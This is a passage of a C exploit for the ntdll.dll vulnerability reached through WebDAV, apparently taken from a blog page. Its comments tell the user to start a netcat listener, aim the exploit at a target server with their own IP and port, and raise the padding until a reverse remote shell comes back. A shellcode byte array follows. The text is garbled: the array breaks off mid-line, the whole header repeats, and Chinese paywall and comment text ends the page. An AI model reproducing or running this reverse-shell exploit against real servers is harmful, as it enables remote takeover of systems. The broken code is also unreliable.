/*******************************************************************/
/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad = 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
/* on all the others servers it was at 2,3,4, etc..sometimes */
/* you can have the force with you, and get the shell in 1 try */
/* sometimes you need to pad more than 10 times;) */
/* the shellcode was coded by myself, it is SEH + ScanMem to */
/* find the famous offsets (GetProcAddress).. */
/* */
/*******************************************************************/
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
char shellc0de[] =
"/x55/x8b/xec/x33/xc9/x53/x56/x57/x8d/x7d/xa2/xb1/x25/xb8/xcc/xcc"
"/xcc/xcc/xf3/xab/xeb/x09/xeb/x0c/x58/x5b/x59/x5a/x5c/x5d/xc3/xe8"
"/xf2/xff/xff/xff/x5b/x80/xc3/x10/x33/xc9/x66/xb9/xb5/x01/x80/x33"
"/x95/x43/xe2/xfa/x66/x83/xeb/x67/xfc/x8b/xcb/x8b/xf3/x66/x83/xc6"
"/x46/xad/x56/x40/x74/x16/x55/xe8/x13/x00/x00/x00/x8b/x64/x24/x08"
"/x64/x8f/x05/x00/x00/x00/x00/x58/x5d/x5
/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad = 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
/* on all the others servers it was at 2,3,4, etc..sometimes */
/* you can have the force with you, and get the shell in 1 try */
/* sometimes you need to pad more than 10 times;) */
/* the shellcode was coded by myself, it is SEH + ScanMem to */
/* find the famous offsets (GetProcAddress).. */
/* */
/*******************************************************************/
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
char shellc0de[] =
"/x55/x8b/xec/x33/xc9/x53/x56/x57/x8d/x7d/xa2/xb1/x25/xb8/xcc/xcc"
"/xcc/xcc/xf3/xab/xeb/x09/xeb/x0c/x58/x5b/x59/x5a/x5c/x5d/xc3/xe8"
"/xf2/xff/xff/xff/x5b/x80/xc3/x10/x33/xc9/x66/xb9/xb5/x01/x80/x33"
"/x95/x43/xe2/xfa/x66/x83/xeb/x67/xfc/x8b/xcb/x8b/xf3/x66/x83/xc6"
"/x46/xad/x56/x40/x74/x16/x55/xe8/x13/x00/x00/x00/x8b/x64/x24/x08"
"/x64/x8f/x05/x00/x00/x00/x00/x58/x5d/x5
最低0.47元/天 解锁文章
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
